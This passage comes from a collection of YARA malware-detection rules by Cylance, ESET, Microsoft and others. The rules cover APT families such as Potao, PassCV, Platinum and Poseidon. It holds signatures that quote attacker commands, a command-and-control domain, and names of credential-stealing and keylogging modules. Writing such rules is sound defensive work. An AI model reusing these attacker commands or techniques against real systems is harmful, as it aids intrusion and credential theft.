ebx 89 19 mov [ecx], ebx 48 dec eax 75 E2 jnz short loc_40EAC6 */ strings: $stype = "stype=info&data=" $mmid = "?mmid=" $status = "&status=run succeed" $mutex = "_KB10B2D1_CIlFD2C" $decode = {8B 1A 8A 1B 80 EB 02 8B 74 24 08 32 1E 8B 31 88 1E 8B 1A 43} condition: $stype or ($mmid and $status) or $mutex or $decode } rule Zlib_Backdoor { meta: author = "Cylance SPEAR Team" /* String C7 45 FC 00 04 00 00 mov [ebp+Memory], 400h C6 45 D8 50 mov [ebp+Str], 'P' C6 45 D9 72 mov [ebp+var_27], 'r' C6 45 DA 6F mov [ebp+var_26], 'o' C6 45 DB 78 mov [ebp+var_25], 'x' C6 45 DC 79 mov [ebp+var_24], 'y' C6 45 DD 2D mov [ebp+var_23], '-' C6 45 DE 41 mov [ebp+var_22], 'A' C6 45 DF 75 mov [ebp+var_21], 'u' C6 45 E0 74 mov [ebp+var_20], 't' C6 45 E1 68 mov [ebp+var_1F], 'h' C6 45 E2 65 mov [ebp+var_1E], 'e' C6 45 E3 6E mov [ebp+var_1D], 'n' C6 45 E4 74 mov [ebp+var_1C], 't' C6 45 E5 69 mov [ebp+var_1B], 'i' C6 45 E6 63 mov [ebp+var_1A], 'c' C6 45 E7 61 mov [ebp+var_19], 'a' C6 45 E8 74 mov [ebp+var_18], 't' C6 45 E9 65 mov [ebp+var_17], 'e' C6 45 EA 3A mov [ebp+var_16], ':' C6 45 EB 20 mov [ebp+var_15], ' ' C6 45 EC 4E mov [ebp+var_14], 'N' C6 45 ED 54 mov [ebp+var_13], 'T' C6 45 EE 4C mov [ebp+var_12], 'L' C6 45 EF 4D mov [ebp+var_11], 'M' C6 45 F0 20 mov [ebp+var_10], ' ' */ strings: $auth = {C6 45 D8 50 C6 45 D9 72 C6 45 DA 6F C6 45 DB 78 C6 45 DC 79 C6 45 DD 2D} $auth2 = {C7 45 FC 00 04 00 00 C6 45 ?? 50 C6 45 ?? 72 C6 45 ?? 6F} $ntlm = "NTLM" wide condition: ($auth or $auth2) and $ntlm } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ // Operation Potao yara rules // For feedback or questions contact us at: github@eset.com // https://github.com/eset/malware-ioc/ // // These yara rules are provided to the community under the two-clause BSD // license as follows: // // Copyright (c) 2015, ESET // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // 1. Redistributions of source code must retain the above copyright notice, this // list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE // FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL // DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER // CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, // OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // private rule PotaoDecoy { strings: $mz = { 4d 5a } $str1 = "eroqw11" $str2 = "2sfsdf" $str3 = "RtlDecompressBuffer" $wiki_str = "spanned more than 100 years and ruined three consecutive" wide $old_ver1 = {53 68 65 6C 6C 33 32 2E 64 6C 6C 00 64 61 66 73 72 00 00 00 64 61 66 73 72 00 00 00 64 6F 63 (00 | 78)} $old_ver2 = {6F 70 65 6E 00 00 00 00 64 6F 63 00 64 61 66 73 72 00 00 00 53 68 65 6C 6C 33 32 2E 64 6C 6C 00} condition: ($mz at 0) and ( (all of ($str*)) or any of ($old_ver*) or $wiki_str ) } private rule PotaoDll { strings: $mz = { 4d 5a } $dllstr1 = "?AVCncBuffer@@" $dllstr2 = "?AVCncRequest@@" $dllstr3 = "Petrozavodskaya, 11, 9" $dllstr4 = "_Scan@0" $dllstr5 = "\x00/sync/document/" $dllstr6 = "\\temp.temp" $dllname1 = "node69MainModule.dll" $dllname2 = "node69-main.dll" $dllname3 = "node69MainModuleD.dll" $dllname4 = "task-diskscanner.dll" $dllname5 = "\x00Screen.dll" $dllname6 = "Poker2.dll" $dllname7 = "PasswordStealer.dll" $dllname8 = "KeyLog2Runner.dll" $dllname9 = "GetAllSystemInfo.dll" $dllname10 = "FilePathStealer.dll" condition: ($mz at 0) and (any of ($dllstr*) and any of ($dllname*)) } private rule PotaoUSB { strings: $mz = { 4d 5a } $binary1 = { 33 C0 8B C8 83 E1 03 BA ?? ?? ?? 00 2B D1 8A 0A 32 88 ?? ?? ?? 00 2A C8 FE C9 88 88 ?? ?? ?? 00 40 3D ?? ?? 00 00 7C DA C3 } $binary2 = { 55 8B EC 51 56 C7 45 FC 00 00 00 00 EB 09 8B 45 FC 83 C0 01 89 45 FC 81 7D FC ?? ?? 00 00 7D 3D 8B 4D FC 0F BE 89 ?? ?? ?? 00 8B 45 FC 33 D2 BE 04 00 00 00 F7 F6 B8 03 00 00 00 2B C2 0F BE 90 ?? ?? ?? 00 33 CA 2B 4D FC 83 E9 01 81 E1 FF 00 00 00 8B 45 FC 88 88 ?? ?? ?? 00 EB B1 5E 8B E5 5D C3} condition: ($mz at 0) and any of ($binary*) } private rule PotaoSecondStage { strings: $mz = { 4d 5a } // hash of CryptBinaryToStringA and CryptStringToBinaryA $binary1 = {51 7A BB 85 [10-180] E8 47 D2 A8} // old hash of CryptBinaryToStringA and CryptStringToBinaryA $binary2 = {5F 21 63 DD [10-30] EC FD 33 02} $binary3 = {CA 77 67 57 [10-30] BA 08 20 7A} $str1 = "?AVCrypt32Import@@" $str2 = "%.5llx" condition: ($mz at 0) and any of ($binary*) and any of ($str*) } rule Potao { meta: Author = "Anton Cherepanov" Date = "2015/07/29" Description = "Operation Potao" Reference = "http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf" Source = "https://github.com/eset/malware-ioc/" Contact = "threatintel@eset.com" License = "BSD 2-Clause" condition: PotaoDecoy or PotaoDll or PotaoUSB or PotaoSecondStage } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule backdoor_apt_pcclient { meta: author = "@patrickrolsen" maltype = "APT.PCCLient" filetype = "DLL" version = "0.1" description = "Detects the dropper: 869fa4dfdbabfabe87d334f85ddda234 AKA dw20.dll/msacm32.drv dropped by 4a85af37de44daf5917f545c6fd03902 (RTF)" date = "2012-10" strings: $magic = { 4d 5a } // MZ $string1 = "www.micro1.zyns.com" $string2 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" $string3 = "msacm32.drv" wide $string4 = "C:\\Windows\\Explorer.exe" wide $string5 = "Elevation:Administrator!" wide $string6 = "C:\\Users\\cmd\\Desktop\\msacm32\\Release\\msacm32.pdb" condition: $magic at 0 and 4 of ($string*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule PassCV_Sabre_Malware_1 { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a" hash2 = "e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55" strings: $x1 = "F:\\Excalibur\\Excalibur\\Excalibur\\" ascii $x2 = "bin\\oSaberSvc.pdb" ascii $s1 = "cmd.exe /c MD " fullword ascii $s2 = "https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=ip138" fullword wide $s3 = "CloudRun.exe" fullword wide $s4 = "SaberSvcB.exe" fullword wide $s5 = "SaberSvc.exe" fullword wide $s6 = "SaberSvcW.exe" fullword wide $s7 = "tianshiyed@iaomaomark1#23mark123tokenmarkqwebjiuga664115" fullword wide $s8 = "Internet Connect Failed!" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and ( 1 of ($x*) and 5 of ($s*) ) ) or ( all of them ) } rule PassCV_Sabre_Malware_Signing_Cert { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" score = 50 hash1 = "7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e" strings: $s1 = "WOODTALE TECHNOLOGY INC" ascii $s2 = "Flyingbird Technology Limited" ascii $s3 = "Neoact Co., Ltd." ascii $s4 = "AmazGame Age Internet Technology Co., Ltd" ascii $s5 = "EMG Technology Limited" ascii $s6 = "Zemi Interactive Co., Ltd" ascii $s7 = "337 Technology Limited" ascii $s8 = "Runewaker Entertainment0" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 3000KB and 1 of them ) } rule PassCV_Sabre_Malware_2 { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4" hash2 = "009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78" hash3 = "92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b" hash4 = "0c7b952c64db7add5b8b50b1199fc7d82e9b6ac07193d9ec30e5b8d353b1f6d2" strings: $x1 = "ncProxyXll" fullword ascii $s1 = "Uniscribe.dll" fullword ascii $s2 = "WS2_32.dll" ascii $s3 = "ProxyDll" fullword ascii $s4 = "JDNSAPI.dll" fullword ascii $s5 = "x64.dat" fullword ascii $s6 = "LSpyb2" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 4000KB and $x1 ) or ( all of them ) } rule PassCV_Sabre_Malware_Excalibur_1 { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "21566f5ff7d46cc9256dae8bc7e4c57f2b9261f95f6ad2ac921558582ea50dfb" hash2 = "02922c5d994e81629d650be2a00507ec5ca221a501fe3827b5ed03b4d9f4fb70" strings: $x1 = "F:\\Excalibur\\Excalibur\\" ascii $x2 = "Excalibur\\bin\\Shell.pdb" ascii $x3 = "SaberSvc.exe" wide $s1 = "BBB.exe" fullword wide $s2 = "AAA.exe" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of ($x*) or all of ($s*) ) or 3 of them } rule PassCV_Sabre_Malware_3 { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1" strings: $x1 = "NXKILL" fullword wide $s1 = "2OLE32.DLL" fullword ascii $s2 = "localspn.dll" fullword wide $s3 = "!This is a Win32 program." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 8000KB and $x1 and 2 of ($s*) ) } rule PassCV_Sabre_Malware_4 { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f" strings: $s1 = "QWNjZXB0On" fullword ascii /* base64 encoded string 'Accept:' */ $s2 = "VXNlci1BZ2VudDogT" fullword ascii /* b64: User-Agent: */ $s3 = "dGFzay5kbnME3luLmN" fullword ascii /* b64: task.dns[ */ condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 2 of them ) } rule PassCV_Sabre_Tool_NTScan { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665" strings: $x1 = "NTscan.EXE" fullword wide $x2 = "NTscan Microsoft " fullword wide $s1 = "admin$" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 2 of them ) } rule PassCV_Sabre_Malware_5 { meta: description = "PassCV Malware mentioned in Cylance Report" author = "Florian Roth" reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" date = "2016-10-20" hash1 = "03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5" strings: $x1 = "ncircTMPg" fullword ascii $x2 = "~SHELL#" fullword ascii $x3 = "N.adobe.xm" fullword ascii $s1 = "NEL32.DLL" fullword ascii $s2 = "BitLocker.exe" fullword wide $s3 = "|xtplhd" fullword ascii /* reversed goodware string 'dhlptx|' */ $s4 = "SERVICECORE" fullword wide $s5 = "SHARECONTROL" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 4000KB and 1 of ($x*) or all of ($s*) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule APT_Win_Pipcreat { meta: author = "chort (@chort0)" description = "APT backdoor Pipcreat" filetype = "pe,dll" date = "2013-03" MD5 = "f09d832bea93cf320986b53fce4b8397" // (incorrectly?) identified as Hupigon by many AV on VT Reference = "http://www.cyberengineeringservices.com/login-exe-analysis-trojan-pipcreat/" version = "1.0" strings: $strA = "pip creat failed" wide fullword $strB = "CraatePipe" ascii fullword $strC = "are you there? " wide fullword $strD = "success kill process ok" wide fullword $strE = "Vista|08|Win7" wide fullword $rut = "are you there!@#$%^&*()_+" ascii fullword condition: $rut or (2 of ($str*)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Trojan_Win32_PlaSrv { meta: author = "Microsoft" description = "Hotpatching Injector" original_sample_sha1 = "ff7f949da665ba8ce9fb01da357b51415634eaad" unpacked_sample_sha1 = "dff2fee984ba9f5a8f5d97582c83fca4fa1fe131" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $Section_name = ".hotp1" $offset_x59 = { C7 80 64 01 00 00 00 00 01 00 } condition: $Section_name and $offset_x59 } rule Trojan_Win32_Platual { meta: author = "Microsoft" description = "Installer component" original_sample_sha1 = "e0ac2ae221328313a7eee33e9be0924c46e2beb9" unpacked_sample_sha1 = "ccaf36c2d02c3c5ca24eeeb7b1eae7742a23a86a" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $class_name = "AVCObfuscation" $scrambled_dir = { A8 8B B8 E3 B1 D7 FE 85 51 32 3E C0 F1 B7 73 99 } condition: $class_name and $scrambled_dir } rule Trojan_Win32_Plaplex { meta: author = "Microsoft" description = "Variant of the JPin backdoor" original_sample_sha1 = "ca3bda30a3cdc15afb78e54fa1bbb9300d268d66" unpacked_sample_sha1 = "2fe3c80e98bbb0cf5a0c4da286cd48ec78130a24" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $class_name1 = "AVCObfuscation" $class_name2 = "AVCSetiriControl" condition: $class_name1 and $class_name2 } rule Trojan_Win32_Dipsind_B { meta: author = "Microsoft" description = "Dipsind Family" sample_sha1 = "09e0dfbb5543c708c0dd6a89fd22bbb96dc4ca1c" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $frg1 = {8D 90 04 01 00 00 33 C0 F2 AE F7 D1 2B F9 8B C1 8B F7 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 4D EC 8B 15 ?? ?? ?? ?? 89 91 ?? 07 00 00 } $frg2 = {68 A1 86 01 00 C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA} $frg3 = {C0 E8 07 D0 E1 0A C1 8A C8 32 D0 C0 E9 07 D0 E0 0A C8 32 CA 80 F1 63} condition: $frg1 and $frg2 and $frg3 } rule Trojan_Win32_PlaKeylog_B { meta: author = "Microsoft" description = "Keylogger component" original_sample_sha1 = "0096a3e0c97b85ca75164f48230ae530c94a2b77" unpacked_sample_sha1 = "6a1412daaa9bdc553689537df0a004d44f8a45fd" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $hook = {C6 06 FF 46 C6 06 25} $dasm_engine = {80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05} condition: $hook and $dasm_engine } rule Trojan_Win32_Adupib { meta: author = "Microsoft" description = "Adupib SSL Backdoor" original_sample_sha1 = "d3ad0933e1b114b14c2b3a2c59d7f8a95ea0bcbd" unpacked_sample_sha1 = "a80051d5ae124fd9e5cc03e699dd91c2b373978b" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "POLL_RATE" $str2 = "OP_TIME(end hour)" $str3 = "%d:TCP:*:Enabled" $str4 = "%s[PwFF_cfg%d]" $str5 = "Fake_GetDlgItemTextW: ***value***=" condition: $str1 and $str2 and $str3 and $str4 and $str5 } rule Trojan_Win32_PlaLsaLog { meta: author = "Microsoft" description = "Loader / possible incomplete LSA Password Filter" original_sample_sha1 = "fa087986697e4117c394c9a58cb9f316b2d9f7d8" unpacked_sample_sha1 = "29cb81dbe491143b2f8b67beaeae6557d8944ab4" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {8A 1C 01 32 DA 88 1C 01 8B 74 24 0C 41 3B CE 7C EF 5B 5F C6 04 01 00 5E 81 C4 04 01 00 00 C3} $str2 = "PasswordChangeNotify" condition: $str1 and $str2 } rule Trojan_Win32_Plagon { meta: author = "Microsoft" description = "Dipsind variant" original_sample_sha1 = "48b89f61d58b57dba6a0ca857bce97bab636af65" unpacked_sample_sha1 = "6dccf88d89ad7b8611b1bc2e9fb8baea41bdb65a" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "VPLRXZHTU" $str2 = {64 6F 67 32 6A 7E 6C} $str3 = "Dqpqftk(Wou\"Isztk)" $str4 = "StartThreadAtWinLogon" condition: $str1 and $str2 and $str3 and $str4 } rule Trojan_Win32_Plakelog { meta: author = "Microsoft" description = "Raw-input based keylogger" original_sample_sha1 = "3907a9e41df805f912f821a47031164b6636bd04" unpacked_sample_sha1 = "960feeb15a0939ec0b53dcb6815adbf7ac1e7bb2" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "<0x02>" wide $str2 = "[CTR-BRK]" wide $str3 = "[/WIN]" wide $str4 = {8A 16 8A 18 32 DA 46 88 18 8B 15 08 E6 42 00 40 41 3B CA 72 EB 5E 5B} condition: $str1 and $str2 and $str3 and $str4 } rule Trojan_Win32_Plainst { meta: author = "Microsoft" description = "Installer component" original_sample_sha1 = "99c08d31af211a0e17f92dd312ec7ca2b9469ecb" unpacked_sample_sha1 = "dcb6cf7cf7c8fdfc89656a042f81136bda354ba6" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {66 8B 14 4D 18 50 01 10 8B 45 08 66 33 14 70 46 66 89 54 77 FE 66 83 7C 77 FE 00 75 B7 8B 4D FC 89 41 08 8D 04 36 89 41 0C 89 79 04} $str2 = {4b D3 91 49 A1 80 91 42 83 B6 33 28 36 6B 90 97} condition: $str1 and $str2 } rule Trojan_Win32_Plagicom { meta: author = "Microsoft" description = "Installer component" original_sample_sha1 = "99dcb148b053f4cef6df5fa1ec5d33971a58bd1e" unpacked_sample_sha1 = "c1c950bc6a2ad67488e675da4dfc8916831239a7" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {C6 44 24 ?? 68 C6 44 24 ?? 4D C6 44 24 ?? 53 C6 44 24 ?? 56 C6 44 24 ?? 00} $str2 = "OUEMM/EMM" $str3 = {85 C9 7E 08 FE 0C 10 40 3B C1 7C F8 C3} condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Plaklog { meta: author = "Microsoft" description = "Hook-based keylogger" original_sample_sha1 = "831a5a29d47ab85ee3216d4e75f18d93641a9819" unpacked_sample_sha1 = "e18750207ddbd939975466a0e01bd84e75327dda" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "++[%s^^unknown^^%s]++" $str2 = "vtfs43/emm" $str3 = {33 C9 39 4C 24 08 7E 10 8B 44 24 04 03 C1 80 00 08 41 3B 4C 24 08 7C F0 C3} condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Plapiio { meta: author = "Microsoft" description = "JPin backdoor" original_sample_sha1 = "3119de80088c52bd8097394092847cd984606c88" unpacked_sample_sha1 = "3acb8fe2a5eb3478b4553907a571b6614eb5455c" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "ServiceMain" $str2 = "Startup" $str3 = {C6 45 ?? 68 C6 45 ?? 4D C6 45 ?? 53 C6 45 ?? 56 C6 45 ?? 6D C6 45 ?? 6D} condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Plabit { meta: author = "Microsoft" description = "Installer component" sample_sha1 = "6d1169775a552230302131f9385135d385efd166" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {4b D3 91 49 A1 80 91 42 83 B6 33 28 36 6B 90 97} $str2 = "GetInstanceW" $str3 = {8B D0 83 E2 1F 8A 14 0A 30 14 30 40 3B 44 24 04 72 EE} condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Placisc2 { meta: author = "Microsoft" description = "Dipsind variant" original_sample_sha1 = "bf944eb70a382bd77ee5b47548ea9a4969de0527" unpacked_sample_sha1 = "d807648ddecc4572c7b04405f496d25700e0be6e" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {76 16 8B D0 83 E2 07 8A 4C 14 24 8A 14 18 32 D1 88 14 18 40 3B C7 72 EA } $str2 = "VPLRXZHTU" $str3 = "%d) Command:%s" $str4 = {0D 0A 2D 2D 2D 2D 2D 09 2D 2D 2D 2D 2D 2D 0D 0A} condition: $str1 and $str2 and $str3 and $str4 } rule Trojan_Win32_Placisc3 { meta: author = "Microsoft" description = "Dipsind variant" original_sample_sha1 = "1b542dd0dacfcd4200879221709f5fa9683cdcda" unpacked_sample_sha1 = "bbd4992ee3f3a3267732151636359cf94fb4575d" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {BA 6E 00 00 00 66 89 95 ?? ?? FF FF B8 73 00 00 00 66 89 85 ?? ?? FF FF B9 64 00 00 00 66 89 8D ?? ?? FF FF BA 65 00 00 00 66 89 95 ?? ?? FF FF B8 6C 00 00 00} $str2 = "VPLRXZHTU" $str3 = {8B 44 24 ?? 8A 04 01 41 32 C2 3B CF 7C F2 88 03} condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Placisc4 { meta: author = "Microsoft" description = "Installer for Dipsind variant" original_sample_sha1 = "3d17828632e8ff1560f6094703ece5433bc69586" unpacked_sample_sha1 = "2abb8e1e9cac24be474e4955c63108ff86d1a034" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = {8D 71 01 8B C6 99 BB 0A 00 00 00 F7 FB 0F BE D2 0F BE 04 39 2B C2 88 04 39 84 C0 74 0A} $str2 = {6A 04 68 00 20 00 00 68 00 00 40 00 6A 00 FF D5} $str3 = {C6 44 24 ?? 64 C6 44 24 ?? 6F C6 44 24 ?? 67 C6 44 24 ?? 32 C6 44 24 ?? 6A} condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Plakpers { meta: author = "Microsoft" description = "Injector / loader component" original_sample_sha1 = "fa083d744d278c6f4865f095cfd2feabee558056" unpacked_sample_sha1 = "3a678b5c9c46b5b87bfcb18306ed50fadfc6372e" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "MyFileMappingObject" $str2 = "[%.3u] %s %s %s [%s:" wide $str3 = "%s\\{%s}\\%s" wide condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Plainst2 { meta: author = "Microsoft" description = "Zc tool" original_sample_sha1 = "3f2ce812c38ff5ac3d813394291a5867e2cddcf2" unpacked_sample_sha1 = "88ff852b1b8077ad5a19cc438afb2402462fbd1a" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "Connected [%s:%d]..." $str2 = "reuse possible: %c" $str3 = "] => %d%%\x0a" condition: $str1 and $str2 and $str3 } rule Trojan_Win32_Plakpeer { meta: author = "Microsoft" description = "Zc tool v2" original_sample_sha1 = "2155c20483528377b5e3fde004bb604198463d29" unpacked_sample_sha1 = "dc991ef598825daabd9e70bac92c79154363bab2" activity_group = "Platinum" version = "1.0" last_modified = "2016-04-12" strings: $str1 = "@@E0020(%d)" wide $str2 = /exit.{0,3}@exit.{0,3}new.{0,3}query.{0,3}rcz.{0,3}scz/ wide $str3 = "---###---" wide $str4 = "---@@@---" wide condition: $str1 and $str2 and $str3 and $str4 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-02-09 Identifier: Poseidon Group APT */ rule PoseidonGroup_Malware { meta: description = "Detects Poseidon Group Malware" author = "Florian Roth" reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/" date = "2016-02-09" score = 85 hash1 = "337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4" hash2 = "344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3" hash3 = "432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61" hash4 = "8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47" hash5 = "d090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f" hash6 = "d7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb" hash7 = "ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3" strings: $s1 = "c:\\winnt\\system32\\cmd.exe" fullword ascii $s2 = "c:\\windows\\system32\\cmd.exe" fullword ascii $s3 = "c:\\windows\\command.com" fullword ascii $s4 = "copy \"%s\" \"%s\" /Y" fullword ascii $s5 = "http://%s/files/" fullword ascii $s6 = "\"%s\". %s: \"%s\"." fullword ascii $s7 = "0x0666" fullword ascii $s8 = "----------------This_is_a_boundary$" fullword ascii $s9 = "Server 2012" fullword ascii /* Goodware String - occured 1 times */ $s10 = "Server 2008" fullword ascii /* Goodware String - occured 1 times */ $s11 = "Server 2003" fullword ascii /* Goodware String - occured 1 times */ $a1 = "net.exe group \"Domain Admins\" /domain" fullword ascii $a2 = "net.exe group \"Admins. do Dom" fullword ascii $a3 = "(SVRID=%d)" fullword ascii $a4 = "(TG=%d)" fullword ascii $a5 = "(SVR=%s)" fullword ascii $a6 = "Set-Cookie:\\b*{.+?}\\n" fullword wide $a7 = "net.exe localgroup Administradores" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 650KB and 6 of ($s*) ) or ( 4 of ($s*) and 1 of ($a*) ) } rule PoseidonGroup_MalDoc_1 { meta: description = "Detects Poseidon Group - Malicious Word Document" author = "Florian Roth" reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/" date = "2016-02-09" score = 80 hash = "0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b" strings: $s1 = "c:\\cmd32dll.exe" fullword ascii condition: uint16(0) == 0xcfd0 and filesize < 500KB and all of them } rule PoseidonGroup_MalDoc_2 { meta: description = "Detects Poseidon Group - Malicious Word Document" author = "Florian Roth" reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/" date = "2016-02-09" score = 70 hash1 = "3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c" hash2 = "1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af" hash3 = "f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a" hash4 = "ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed" hash5 = "27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778" hash6 = "1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216" strings: $s0 = "{\\*\\generator Msftedit 5.41." ascii $s1 = "Attachment 1: Complete Professional Background" ascii $s2 = "E-mail: \\cf1\\ul\\f1" $s3 = "Education:\\par" ascii $s5 = "@gmail.com" ascii condition: uint32(0) == 0x74725c7b and filesize < 500KB and 3 of them } // Operation Groundbait yara rules // For feedback or questions contact us at: github@eset.com // https://github.com/eset/malware-ioc/ // // These yara rules are provided to the community under the two-clause BSD // license as follows: // // Copyright (c) 2016, ESET // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // 1. Redistributions of source code must retain the 